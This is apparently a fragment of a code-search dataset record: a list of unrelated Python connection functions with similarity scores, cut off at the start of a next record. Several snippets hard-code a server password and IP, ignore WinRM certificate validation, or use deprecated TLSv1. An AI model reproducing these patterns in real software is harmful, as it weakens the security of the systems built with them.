= client.Connection(self._endpoint)\n self._i2cp.open()\n while not self._state.is_connected():\n time.sleep(0.1)", "def open(self):\n try:\n if self.verbose:\n print \"Trying to open connection to Leica at \",self.IP_address,\":\",str(self.port)\n self.leicasocket = socket.socket()\n self.leicasocket.connect((self.IP_address,self.port))\n if self.verbose:\n print(\"Connected.\")\n self.connected=True\n return True\n except:\n if self.verbose:\n print \"Error opening connection to \", self.IP_address\n self.connected=False\n return False", "def connect(self) -> None:\n self.client_socket.connect((self.server_name, self.server_port))", "def connect(self):\n\n print(\"Connecting to server at {}:{}\".format(self.hostname, self.port))\n\n self._sock = socket.socket()\n self._sock.setblocking(True)\n self._sock.connect((self.hostname, self.port))\n self._sockfile = self._sock.makefile(encoding=\"utf-8\")\n self._connected = True\n\n if self.password:\n self._sendmsg(\"PASS :{}\".format(self.password))\n self._sendmsg(\"NICK {}\".format(self.nickname))\n self._sendmsg(\"USER {} 0 * :ORE Utility Bot\".format(getpass.getuser()))\n if self.ident_password:\n self._sendmsg(\"PRIVMSG NickServ :identify {}\".format(\n self.ident_password))\n self._sendmsg(\"JOIN {}\".format(\",\".join(self.channels)))", "def connect(self):\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.connect((self.host, PORT)) # probably throws errors\n self.connected = True", "def connect_to_server(self):\n\n try:\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.connect((self.hostname, self.port))\n return client\n except Exception as e:\n print(\"Can't connect to server: \", e)\n sys.exit()", "def connect(self):\n self.client.connect(self.host, self.port)\n self.client.loop_forever()", "def _initRemoteMDSConnection(shotno):\n\tconn = _mds.Connection(_pref._HBT_SERVER_ADDRESS+':8003');\n\tconn.openTree('hbtep2', shotno);\n\treturn conn", "def connect(self) -> None:\n self.terminate()\n self._new_client().connect(\n hostname=self.ip,\n port=self.port,\n username=self.username,\n password=self.password,\n look_for_keys=False,\n allow_agent=False)", "def _connect(self):\r\n self.sock = socket.socket()\r\n host = \"pubsub.pubnub.com\"\r\n port = 80\r\n if self.use_ssl:\r\n self.sock = ssl.wrap_socket(self.sock)\r\n port = 443\r\n self.sock.connect((host, port))\r\n self.connected = True", "def openSocket():\n sock = socket.socket()\n sock.settimeout(2)\n sock.connect((IRC_HOST, IRC_PORT))\n sock.send(\"PASS {}\\r\\n\".format(priv.PASS).encode(\"utf-8\"))\n sock.send(\"NICK {}\\r\\n\".format(priv.NICK).encode(\"utf-8\"))\n\n sock.send(\"CAP REQ :twitch.tv/membership\\r\\n\".encode(\"utf-8\"))\n sock.send(\"CAP REQ :twitch.tv/tags\\r\\n\".encode(\"utf-8\"))\n sock.send(\"CAP REQ :twitch.tv/commands\\r\\n\".encode(\"utf-8\"))\n\n return sock", "def connect_to_server(self):\n\t\tself.outside.start()\n\t\tself.outside.register(self.config.server_ip, self.config.server_port)\n\n\t\tself.thin.start()\n\t\tself.thin.register(self.config.server_ip, self.config.server_port)", "def connect(self):\n self.sock = socket.socket()\n self.sock.connect(self.addr)\n self.send(\"PASS {}\".format(self.password))\n self.send(\"NICK {}\".format(self.nick))\n self.send(\"JOIN {}\".format(self.channel))\n self.send(\"CAP REQ :twitch.tv/tags\")\n self.is_connected = True\n # TODO: error handling", "def connect(self):\r\n try:\r\n self.host_win_ip = \"http://\" + self.host_ip + \":5985/wsman\"\r\n self.conn = Protocol(\r\n endpoint=self.host_win_ip,\r\n transport=\"ntlm\",\r\n username=self.usr,\r\n password=self.pwd,\r\n server_cert_validation=\"ignore\")\r\n logger.warn(\"Connecting Windows ...\")\r\n self.shell_id = self.conn.open_shell()\r\n logger.warn(self.shell_id)\r\n logger.warn('Connected to Windows.')\r\n except Exception as error:\r\n msg_exception_error = \"Exception raised: %s \" % error\r\n raise(msg_exception_error)", "def connect():", "def _open(self):\n \n # Open Device\n try:\n logger.debug(\"%s: TCP port opening started...\" % \\\n self.__class__.__name__)\n errno = 115\n while errno == 115:\n try:\n self._tcp_socket.connect(self._addr)\n errno = 0\n except socket.error as fx:\n if fx.args[0] != 115:\n raise fx\n self._socket = HorizonTransport_Socket(sock = self._tcp_socket,\n host = self._addr[0],\n port = self._addr[1],\n name = \"%s:%d\" % self._addr,\n encryption =self._encryption,\n key = self._key,\n store_timeout = self.store_timeout,\n version = self.version)\n self._socket.opened = True\n logger.debug(\"%s: ...TCP port opening complete.\" % \\\n self.__class__.__name__)\n \n # Open failed\n except Exception as ex:\n logger.error(\"%s: ...TCP port opening failed:\\n%s\" % \\\n (self.__class__.__name__, str(ex)))\n raise utils.TransportError \\\n (\"TCP Port open failed!\\n\" + str(ex))", "def start(self):\n self.protocol.makeConnection(self.transport)", "def start(self):\n self.protocol.makeConnection(self.transport)", "def telnet(self):\n self.log.info(\"connect-via-telnet\")\n telnet = distutils.spawn.find_executable(\"telnet\")\n os.execv(telnet, (\"telnet\", \"localhost\", str(self.qemu.monitor_port)))", "def Connect(self):\r\n #sleep(1)\r\n #self.src_ref = randint(1, 20)\r\n self.src_ref = 10\r\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.s.settimeout(self.timeout)\r\n self.s.connect((self.ip, self.port))\r\n self.s.send(TPKTPacket(COTPConnectionPacket(self.dst_ref,\r\n self.src_ref,\r\n self.dst_tsap,\r\n self.src_tsap,\r\n 0x0a)).pack())\r\n reply = self.s.recv(1024)\r\n _ = COTPConnectionPacket().unpack(TPKTPacket().unpack(reply).data)\r\n\r\n self.NegotiatePDU()", "def Connection(self):\n try:\n system(\n f'netsh advfirewall firewall add rule name=\"Open Port {self.PORT}\" dir=in action=allow protocol=TCP localport={self.PORT} remoteip={self.HOST}')\n with socket() as s: # Create a socket object\n print('Server started!')\n print('Waiting for clients...')\n s.bind((self.HOST, self.PORT)) # Bind to the port\n s.listen(5) # Now wait for client connection.\n self.c, addr = s.accept() # Establish connection with client.\n # Remote client machine connection\n print('Got connection from', addr)\n except error as strerror:\n print(\"Network problems:\", strerror)\n return 0\n return 1", "def _establish_connection(self):\n self.conn = self.listener.accept()", "def connect(self):\n\n self.wm = telnetlib.Telnet(self.ip, self.port, self.timeout)\n time.sleep(2)\n print self.wm.read_very_eager() #clears connection message\n self.measure_chan()", "def connect_to_server(host, port) -> socket.SocketIO:\n # Create a TCP/IP socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Connect the socket to the port where the server is listening\n server_address = (host, port)\n print('[CLIENT LOG] connecting to {} port {}'.format(host,port)) \n sock.connect(server_address)\n return sock", "def __init__(self,\n host_name='127.0.0.1',\n port=ControlServer.CONTROL_PORT):\n\n self._socket = QtNetwork.QTcpSocket()\n self._socket.connected.connect(self._connected)\n self._socket.disconnected.connect(self._disconnected)\n self.connected = False\n self._socket.connectToHost(host_name, port)", "def __init__(self):\n # Create a TCP/IP socket\n self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)", "def start(self):\n if not self._connected:\n self._client.connect(self._addr, port=self._port, keepalive=60, bind_address=\"\")\n self._client.loop_start()\n self._connected = True\n logger.info(\"Connection with MQTT Broker at %s:%d estabilished.\", self._addr, self._port)", "def rhevConnect():\n rhev = rhev_settings.HOST_PORT\n conn = httplib.HTTPSConnection(rhev)\n return conn", "def enter_as_network_client(ai_settings,grid, screen, buttons,screen_status, button_status, card_database_filter, user,action, player2):\n host = user.ip_address\n port = 5555\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n s.connect((host,port))\n while 1:\n pass\n\n s.close()", "def connect_to_worker():\n socket = context.socket(zmq.REQ)\n socket.connect(\"tcp://localhost:5555\")\n return socket", "def start(self):\n\n address = (socket.gethostbyname(self.hostname), self.port)\n logger.info(\"Connecting to %r\" % (address,))\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._socket.connect(address)\n self._start_processors()\n return self", "def connect(self):\n if not self._socket:\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._socket.connect((self.host, self.port))\n self._socket.settimeout(0.0)", "def connect(self):\n self.class_logger.info(\"Performing connection to TRex server via HLT API\")\n self.check_res(self.hltapi.connect(device=self.host, port_list=self.ports, reset=True, break_locks=True))", "def __init__(self):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.PORT = 2222\n # connect on construction,\n # use for duration of a game,\n # close connection on destruction later\n self.sock.connect((\"192.168.43.180\", self.PORT))", "def connect(self,ip,port):\n return self.network.connect(ip,port)", "def setup(self):\n self.ip = self.client_address[0]\n self.port = self.client_address[1]\n self.connection = self.request #TCP socket object for the client\n self.server.clients[(self.ip, self.port)] = self\n self.server.peers.append((self.connection)) \n for client in self.server.clients:\n print(\"Connected client: \", client)\n\n #for peer in self.server.peers:\n # print(\"Peers: \", peer)", "def connect_to_server(self):\n\n server=os.popen('hostname').read()\n if 'epfl.ch' not in server:\n conn = mds.Connection('tcvdata.epfl.ch')\n conn.openTree('tcv_shot', self.shot)\n self.tree = conn\n print(\"You are in server \"+server+\", so I'll open a connection\")\n else:\n self.tree = mds.Tree('tcv_shot', self.shot)", "def run(self):\n HOST = 'localhost' # Symbolic name meaning all available interfaces\n PORT = 54123 # Arbitrary non-privileged port\n \n \n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, PORT))\n while(self.running):\n s.listen(1)\n conn, addr = s.accept()\n self.listen_to_connection(conn)\n conn.close()\n s.close()", "def connect(self, cmd, window, **kwargs):\n try:\n kwargs['server']\n except KeyError:\n window.server_event('/%s syntax: /%s servername [port] [nickname]' % cmd)\n return\n try:\n kwargs['port']\n try: \n int(kwargs['port'])\n except ValueError:\n raise KeyError\n except KeyError:\n kwargs['port'] = 6667\n try:\n kwargs['nickname']\n except KeyError:\n kwargs['nickname'] = \"circe\"\n self.connection.connect(**kwargs)", "def __init__(self, ip_address=\"127.0.0.1\", port=8777, network_timeout=120):\n self._tcp_client = TCPClient(ip_address, port, network_timeout)\n self._tcp_client.connect()\n self._tcp_lock = threading.Lock()", "def _connect(self):\n #print(\"Connecting...\")\n self._connection = reactor.connectTCP(self.host, self.port, self.factory) #@UndefinedVariable", "def connect(self):\n self.sock.connect((self.host, self.port))\n self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n logger.debug(\"TCPSPP: Connected to %s:%d\", self.host, self.port)", "def __connect():\n # Create socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Connect socket to server\n sock.connect((SERVER_IP, SERVER_PORT))\n\n # Return connected socket\n return sock", "def connect(self, host, port=6667):\n\t\tprint(host)\n\t\tprint(port)\n\t\tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)\n\t\tself.s = ssl.wrap_socket(sock)\n\t\tself.s.connect((host, port))", "def init_conn(self):\n \n SERVER_ADDRESS = '192.168.0.21'\n PORT = 8018\n SERVER_PASSWORD = \"biratkingofcomedy\" \n connected = False\n \n # check if test module is being run\n if self.testing == 'n': \n while not connected:\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n \n try:\n self.socket.connect((SERVER_ADDRESS, PORT))\n \n # server verification\n self.socket.sendall(self.make_packet(\"DATA\", SERVER_PASSWORD))\n \n response = self.socket.recv(4096)\n \n if response:\n response_hdr, response_msg, response_sdr = self.parse_packet(response)\n \n if response_hdr == \"ERROR\" and response_msg == \"IDENTIFY FAILED\":\n raise Exception(\"PASSWORD FAIL\")\n \n elif response_hdr == \"DATA\" and response_msg == \"CONNECTED\":\n connected = True\n \n else:\n raise Exception(\"CONNECTION FAIL\") \n \n except Exception as e:\n if e == \"PASSWORD FAIL\":\n print(\"DEBUG: server connection failed (invalid credentials)\")\n print(\"DEBUG: quitting\")\n break\n \n else:\n print(e)\n print(\"DEBUG: server connection failed (could not connect), trying again in 10s\")\n time.sleep(10)\n \n else:\n print(\"DEBUG: socket setup skipped\")", "def connect(self):\n if not self._connected:\n try:\n self.socket.connect((self.data[\"addr\"], self.data[\"port\"]))\n if self.data.get(\"tls\"):\n self.cert = self.socket.getpeercert()\n except OSError as err:\n _LOGGER.exception(\n \"PyISY could not connect to ISY event stream. %s\", err\n )\n if self._on_lost_function is not None:\n self._on_lost_function()\n return False\n self.socket.setblocking(0)\n self._writer = self.socket.makefile(\"w\")\n self._connected = True\n self.isy.connection_events.notify(ES_CONNECTED)\n return True\n return True", "def connect(self, connID, addr):\r\n return self.callRemote('connect', connID, addr)", "def connect():\n logging.info('Client connected')", "def createConnectionToCli(self):\n connected = False\n # loop until connected\n while not connected:\n try:\n self.dataClient = Client(\n ('localhost', 5000), authkey=b'secret password')\n connected = True\n except ConnectionRefusedError:\n pass\n\n self.logger.debug('Connected to Process!')", "def open(self):\n self._server = socketserver.ThreadingTCPServer(\n server_address=('localhost', self._requested_local_port),\n RequestHandlerClass=self._create_handler(self._ssh_client, self._remote_host, self._remote_port),\n )\n\n threading.Thread(target=self.serve_forever).start()\n\n print('Forwarding local port {} to remote {}:{}'.format(self.local_port, self.remote_host, self.remote_port))", "def openCircuit(srv):", "def open_socket(port, on_data, on_quit = None):\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, port))\n s.listen()\n try:\n while True:\n conn, addr = s.accept()\n while True:\n data_enc = conn.recv(BUFFER_SIZE)\n if not data_enc:\n break\n # Decode the data\n data_dec = data_enc.decode('utf-8')\n conn.sendall(on_data(data_dec).encode())\n except:\n if on_quit:\n on_quit()", "def _connect(self):\n\n # Get the timeout\n m_timeout = OMPv4.TIMEOUT\n if self.__timeout:\n m_timeout = self.__timeout\n\n # Connect to the server\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(m_timeout)\n try:\n sock.connect((self.__host, int(self.__port)))\n except socket.error, e:\n raise ServerError(str(e))\n self.socket = ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1)\n\n # Authenticate to the server\n self._authenticate(self.__username, self.__password)", "def connect(self):\n try:\n self._send = 0\n self.socket = socket.socket(socket.AF_INET,\n socket.SOCK_STREAM,\n socket.getprotobyname('tcp'))\n self.socket.connect((self.host, self.port))\n self.socket.recv(self.packet_size)\n except socket.error:\n raise ConnectionError(\n 'Cannot connect to server at %s' % self.name)", "def open(self):\n self.device = ConnectHandler(\n device_type='vyos',\n host=self.hostname,\n username=self.username,\n password=self.password,\n timeout=self.timeout,\n port=self.port\n )", "def run(self):\n\t\t\n\t\tself.connect(self.config[\"server\"])", "def conectar(self):\r\n self.socket = socket.create_connection((self.host, self.puerto))", "def _connect(self):\n try:\n #print(\"try to connect _connect\")\n sock = gevent.socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect(self.remote_address)\n except socket.error as error:\n logger.warning(\"Couldn't connect to %s: %s.\",\n self._repr_remote(), error)\n else:\n self.initialize(sock, self.remote_service_coord)", "def connect(self):\n assert self.listening\n assert not self.connected\n ctx = zmq.Context.instance()\n port = NODE_INFOS[self.ID].port\n self._send_socket = ctx.socket(zmq.PUB)\n self._send_socket.bind(f\"tcp://*:{port}\")\n self.connected = True", "def connect(self,ip,port):\n import time\n import socket\n\n try:\n self.socket_reference.connect((ip, port))\n except socket.error:\n self.close()\n reload(socket)\n raise CommClientException(\"Cannot connect to \" + ip + \":\" + str(port))", "def startTwoWayTCP():\r\n print(\"=================================\\n\")\r\n print(\" starting TCP test\")\r\n print(\"\\n=================================\")\r\n os.system(\"iperf3.exe -s -B 11.0.0.50 --logfile Server1.txt\")\r\n os.system(\"iperf3.exe -s -B 11.0.0.51 --logfile Server2.txt\")\r\n os.system(\"iperf3.exe -c 11.0.0.50 -b 0 -B 11.0.0.51 -t 0 -V --logfile Client1.txt\")\r\n os.system(\"iperf3.exe -c 11.0.0.51 -b 0 -B 11.0.0.50 -t 0 -V --logfile Client2.txt\")\r\n time.sleep(0.5)\r\n return isTCPRunning()", "def connect(self, host, port=6667, use_ssl=False):\n self.log('@ Connecting to %s port %d' % (host, port))\n\n self.sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n self.sk.connect((host, port))\n self.log('@ Connected')\n self.connected = True\n self.heartbeat.start()\n self._callback('on_connected')", "def init_tcp_conn(target: str, port: int) -> socket.socket:\n conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n conn.settimeout(5)\n try:\n conn.connect((target, port))\n return conn\n except socket.timeout as e:\n print(e)\n return None", "def connect(self):\n # Standard implementation from HTTPSConnection, which is not\n # designed for extension, unfortunately\n sock = socket.create_connection((self.host, self.port),\n self.timeout, self.source_address)\n if getattr(self, '_tunnel_host', None):\n self.sock = sock\n self._tunnel()\n\n # This is the only difference; default wrap_socket uses SSLv23\n self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=ssl.PROTOCOL_TLSv1_2)", "def connect(self):\n\t\tself._entity_server_connection.attempt_connection()", "def admin_client():\n host = '127.0.0.1'\n port = 8126\n return TcpClient(host, port)", "def connect(self):\n self.socket.connect(f'tcp://{self.ip}:{self.port}')\n self.socket.send_string('PUB_PORT')\n self.pub_port = self.socket.recv_string()\n self.pub_socket = zmq.Socket(self.ctx, zmq.PUB)\n self.pub_socket.connect(f\"tcp://{self.ip}:{self.pub_port}\")", "def open(self):\n broker = os.path.join(getsitepackages()[0], 'pynq_networking', 'rsmb',\n 'rsmb', 'src', 'broker_mqtts')\n\n self.close()\n os.system(f\"nohup {broker} > {self.log} &\")\n\n for t in MQTT_PACKET_TYPES:\n bind_layers(MQTT, t, {'type': t.type})\n\n bind_layers(TCP, MQTT_Stream, {'dport': self.mqtt_port})\n bind_layers(TCP, MQTT_Stream, {'sport': self.mqtt_port})\n\n for t in MQTTSN_PACKET_TYPES:\n bind_layers(MQTTSN, t, {'type': t.type})\n\n bind_layers(UDP, MQTTSN, {'dport': self.mqttsn_port})\n bind_layers(UDP, MQTTSN, {'sport': self.mqttsn_port})", "def connect(self):\n self.snmp_client = SNMPClient(host=self.host,\n read_community=self.read_community,\n write_community=self.write_community,\n port=self.port,\n version=self.version,\n log=self.log)", "def connect_to_ibkr(self):\n\n self.update_console(\"Reporting connection to the server...\")\n print(\"Reporting connection to the server...\")\n result = report_login_to_server(self.settings)\n self.update_console(result)\n connector = Worker(self.ibkrworker.prepare_and_connect)\n connector.signals.result.connect(self.connection_done)\n connector.signals.status.connect(self.update_status)\n connector.signals.notification.connect(self.update_console)\n # Execute\n self.threadpool.start(connector)", "def mxt_connect(self):\n self._mxt_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self._mxt_sock.connect((self._host, 10000))", "def _lowLevelOpen(self):\n import socket\n self.socket_reference = socket.socket(socket.AF_INET, socket.SOCK_STREAM)", "def connection_init(self, port, ip):\n\t\t# Инициализация сокета и сообщение серверу о нашем появлении\n\t\tself.transport = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\t\n\t\t# Таймаут необходим для освобождения сокета.\n\t\tself.transport.settimeout(5)\n\t\t\n\t\t# Соединяемся, 5 попыток соединения, флаг успеха ставим в True если\n\t\t# удалось\n\t\tconnected = False\n\t\tfor i in range(5):\n\t\t\tclient_log.info(f'Попытка подключения №{i + 1}')\n\t\t\ttry:\n\t\t\t\tself.transport.connect((ip, port))\n\t\t\texcept (OSError, ConnectionRefusedError):\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tconnected = True\n\t\t\t\tclient_log.debug(\"Connection established.\")\n\t\t\t\tbreak\n\t\t\ttime.sleep(1)\n\t\t\n\t\t# Если соединится не удалось - исключение\n\t\tif not connected:\n\t\t\tclient_log.critical('Не удалось установить соединение с сервером')\n\t\t\traise ServerError('Не удалось установить соединение с сервером')\n\t\t\n\t\tclient_log.debug('Starting auth dialog.')\n\t\t\n\t\t# Запускаем процедуру авторизации\n\t\t# Получаем хэш пароля\n\t\tpasswd_bytes = self.password.encode('utf-8')\n\t\tsalt = self.username.lower().encode('utf-8')\n\t\tpasswd_hash = hashlib.pbkdf2_hmac('sha512', passwd_bytes, salt, 10000)\n\t\tpasswd_hash_string = binascii.hexlify(passwd_hash)\n\t\t\n\t\tclient_log.debug(f'Passwd hash ready: {passwd_hash_string}')\n\t\t\n\t\t# Получаем публичный ключ и декодируем его из байтов\n\t\tpubkey = self.keys.publickey().export_key().decode('ascii')\n\t\t\n\t\t# Авторизируемся на сервере\n\t\twith socket_lock:\n\t\t\tpresense = {\n\t\t\t\tACTION: PRESENCE,\n\t\t\t\tTIME: time.time(),\n\t\t\t\tUSER: {\n\t\t\t\t\tACCOUNT_NAME: self.username,\n\t\t\t\t\tPUBLIC_KEY: pubkey\n\t\t\t\t}\n\t\t\t}\n\t\t\tclient_log.debug(f\"Presense message = {presense}\")\n\t\t\t# Отправляем серверу приветственное сообщение.\n\t\t\ttry:\n\t\t\t\tsend_message(self.transport, presense)\n\t\t\t\tans = get_message(self.transport)\n\t\t\t\tclient_log.debug(f'Server response = {ans}.')\n\t\t\t\t# Если сервер вернул ошибку, бросаем исключение.\n\t\t\t\tif RESPONSE in ans:\n\t\t\t\t\tif ans[RESPONSE] == 400:\n\t\t\t\t\t\traise ServerError(ans[ERROR])\n\t\t\t\t\telif ans[RESPONSE] == 511:\n\t\t\t\t\t\t# Если всё нормально, то продолжаем процедуру\n\t\t\t\t\t\t# авторизации.\n\t\t\t\t\t\tans_data = ans[DATA]\n\t\t\t\t\t\thash = hmac.new(passwd_hash_string, ans_data.encode('utf-8'), 'MD5')\n\t\t\t\t\t\tdigest = hash.digest()\n\t\t\t\t\t\tmy_ans = RESPONSE_511\n\t\t\t\t\t\tmy_ans[DATA] = binascii.b2a_base64(\n\t\t\t\t\t\t\tdigest).decode('ascii')\n\t\t\t\t\t\tsend_message(self.transport, my_ans)\n\t\t\t\t\t\tself.process_server_ans(get_message(self.transport))\n\t\t\texcept (OSError, json.JSONDecodeError) as err:\n\t\t\t\tclient_log.debug(f'Connection error.', exc_info=err)\n\t\t\t\traise ServerError('Сбой соединения в процессе авторизации.')", "def connect(self):\n \n try:\n self.__sock.connect((self.__host, self.__port))\n\n except socket.error,e:\n print 'Oops, unable to connect. Try again!',e\n sys.exit(1)", "def start_socket(ip, port):\n try:\n # initiate socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # connect to server\n print(\"socket connected at ip {} and port {}\".format(ip, port))\n sock.connect((ip, port))\n return sock\n except Exception as e:\n print(\"Error start_socket\", e)\n #exit()", "def __init__(self, hostname, debugOut=None, noProto=False, connectNow=True, portNumber=4403):\n\n logging.debug(f\"Connecting to {hostname}\")\n\n server_address = (hostname, portNumber)\n sock = socket.create_connection(server_address)\n\n # Instead of wrapping as a stream, we use the native socket API\n # self.stream = sock.makefile('rw')\n self.stream = None\n self.socket = sock\n\n StreamInterface.__init__(\n self, debugOut=debugOut, noProto=noProto, connectNow=connectNow)", "def start_tcp_server(server_info: ServerInfo, lock: Lock) -> None:\n lock.acquire() # this lock means that socket is still creating\n sock: socket.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind(('127.0.0.1', 0)) # bind to a random free port\n sock.listen(1)\n server_info.port = sock.getsockname()[1] # save the number of the server port\n lock.release() # the socket is created\n _ = sock.accept() # blocks here until a connection from a client\n server_info.connection_established = True\n sock.close()", "def open_tcp(self, url):\n assert self._socket is None, 'The connection has already been established'\n\n logger.debug('Opening a tcp msgpackrpc connection')\n self._socket = socket.create_connection((url.hostname, url.port))\n\n # set TCP NODELAY\n if self._tcp_no_delay:\n self._socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n\n if self._timeout:\n self._socket.settimeout(self._timeout)" ]
[ "0.62255913", "0.62050253", "0.6195879", "0.6171926", "0.6135462", "0.6120585", "0.606939", "0.60673463", "0.602371", "0.6017615", "0.60021055", "0.60011834", "0.5976623", "0.5967753", "0.5963107", "0.59526026", "0.59498817", "0.5947324", "0.5940068", "0.5910819", "0.59102845", "0.5908937", "0.5888914", "0.5888275", "0.5881181", "0.5865311", "0.5864343", "0.5863684", "0.58565176", "0.58555764", "0.58541733", "0.5850206", "0.58318573", "0.5818854", "0.5818822", "0.5812058", "0.58058214", "0.5803451", "0.5789198", "0.5789198", "0.57809496", "0.5779891", "0.57734543", "0.57625383", "0.57586586", "0.5736914", "0.5734025", "0.57334524", "0.5725897", "0.5705459", "0.5701855", "0.5695122", "0.5694719", "0.5694133", "0.5687389", "0.56836444", "0.56706226", "0.56553346", "0.56507635", "0.5645613", "0.564472", "0.56447196", "0.5635904", "0.56333834", "0.563298", "0.562174", "0.5614954", "0.56119174", "0.55932266", "0.5592886", "0.5590318", "0.5577666", "0.55763644", "0.55738795", "0.55729413", "0.55674857", "0.5562373", "0.55618954", "0.5561572", "0.5555004", "0.5553721", "0.5550618", "0.5544552", "0.5538928", "0.55331653", "0.55302584", "0.5529091", "0.55213916", "0.551844", "0.5517037", "0.550121", "0.54923254", "0.54868203", "0.5486626", "0.548428", "0.547646", "0.54739517", "0.5463272", "0.545411", "0.54534906" ]
0.68877107
0
Connection routine for the CCD (given below in ccd variable). The following CCD properties are accessed. More can be found by going to indilib.org. CONNECTION Switch CCD_EXPOSURE Number CCD1 BLOB CCD_BINNING Number CCD_ABORT_EXPOSURE Number CCD_TEMPERATURE Number CCD_COOLER Switch CCD_FRAME_TYPE Switch
def connect_to_ccd(): ccd="SX CCD SXVR-H694" device_ccd=indiclient.getDevice(ccd) while not(device_ccd): time.sleep(0.5) device_ccd=indiclient.getDevice(ccd) print("Searching for device...") print("Found device") ccd_connect=device_ccd.getSwitch("CONNECTION") while not(ccd_connect): time.sleep(0.5) ccd_connect=device_ccd.getSwitch("CONNECTION") if not(device_ccd.isConnected()): ccd_connect[0].s=PyIndi.ISS_ON # the "CONNECT" switch ccd_connect[1].s=PyIndi.ISS_OFF # the "DISCONNECT" switch indiclient.sendNewSwitch(ccd_connect) ccd_exposure=device_ccd.getNumber("CCD_EXPOSURE") while not(ccd_exposure): time.sleep(0.5) ccd_exposure=device_ccd.getNumber("CCD_EXPOSURE") # inform the indi server that we want to receive the # "CCD1" blob from this device indiclient.setBLOBMode(PyIndi.B_ALSO, ccd, "CCD1") ccd_ccd1=device_ccd.getBLOB("CCD1") while not(ccd_ccd1): time.sleep(0.5) ccd_ccd1=device_ccd.getBLOB("CCD1") # get access to setting the CCD's binning value ccd_bin=device_ccd.getNumber("CCD_BINNING") while not(ccd_bin): time.sleep(0.5) ccd_bin=device_ccd.getNumber("CCD_BINNING") # get access to aborting the CCD's exposure ccd_abort=device_ccd.getSwitch("CCD_ABORT_EXPOSURE") while not(ccd_abort): time.sleep(0.5) ccd_abort=device_ccd.getSwitch("CCD_ABORT_EXPOSURE") # get access to the CCD's temperature value ccd_temp=device_ccd.getNumber("CCD_TEMPERATURE") while not(ccd_temp): time.sleep(0.5) ccd_temp=device_ccd.getNumber("CCD_TEMPERATURE") # get access to switching the CCD's cooler on/off ccd_cooler=device_ccd.getSwitch("CCD_COOLER") while not(ccd_cooler): time.sleep(0.5) ccd_cooler=device_ccd.getSwitch("CCD_COOLER") # get access to switching the CCD's image frame type ccd_frame=device_ccd.getSwitch("CCD_FRAME_TYPE") while not(ccd_frame): time.sleep(0.5) ccd_frame=device_ccd.getSwitch("CCD_FRAME_TYPE") return ccd_exposure, ccd_ccd1, ccd_bin, ccd_abort, ccd_temp, ccd_cooler, ccd_frame
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def open_circ():\n\n set_mode(mode_cc) # set operation mode to CC\n time.sleep(.250)\n set_CC_current(cc_current=0) # set CC mode current to 0 amps\n time.sleep(.1)\n \n oc_vals = get_input_values() # read open circuits levels\n oc_data_point = data_point(oc_vals) # create data point for open circuit measurement\n voc = oc_data_point[3] # open circuit voltage measurement\n print('Open circuit voltage: ', voc)\n write_data_tofile(oc_data_point) # write data to file\n \n return voc", "def ccd(self):\n self.spectrum = self.spectrum", "def setCcdMode(*argv):", "def openCircuit(srv):", "def exposure(frameType, expTime):\n\n blobEvent.clear() \n\n # set the specified frame type\n if frameType.lower() == 'light':\n ccd_frame[0].s = PyIndi.ISS_ON\n ccd_frame[1].s = PyIndi.ISS_OFF\n ccd_frame[2].s = PyIndi.ISS_OFF\n ccd_frame[3].s = PyIndi.ISS_OFF \n indiclient.sendNewSwitch(ccd_frame)\n elif frameType.lower() == 'bias':\n ccd_frame[0].s = PyIndi.ISS_OFF\n ccd_frame[1].s = PyIndi.ISS_ON\n ccd_frame[2].s = PyIndi.ISS_OFF\n ccd_frame[3].s = PyIndi.ISS_OFF \n indiclient.sendNewSwitch(ccd_frame)\n elif frameType.lower() == 'dark':\n ccd_frame[0].s = PyIndi.ISS_OFF\n ccd_frame[1].s = PyIndi.ISS_OFF\n ccd_frame[2].s = PyIndi.ISS_ON\n ccd_frame[3].s = PyIndi.ISS_OFF \n indiclient.sendNewSwitch(ccd_frame)\n elif frameType.lower() == 'flat':\n ccd_frame[0].s = PyIndi.ISS_OFF\n ccd_frame[1].s = PyIndi.ISS_OFF\n ccd_frame[2].s = PyIndi.ISS_OFF\n ccd_frame[3].s = PyIndi.ISS_ON \n indiclient.sendNewSwitch(ccd_frame)\n\n # set the value for the next exposure\n ccd_exposure[0].value=expTime\n\n indiclient.sendNewNumber(ccd_exposure)\n\n # wait for the exposure\n blobEvent.wait()\n\n for blob in ccd_ccd1:\n # pyindi-client adds a getblobdata() method to IBLOB item\n # for accessing the contents of the blob, which is a bytearray in Python\n image_data=blob.getblobdata()\n\n # write the byte array out to a FITS file\n global imgNum\n global imgName\n imgNum += 1\n fileName = fileDir+'raw-'+str(imgNum).zfill(8)+'.fits'\n f = 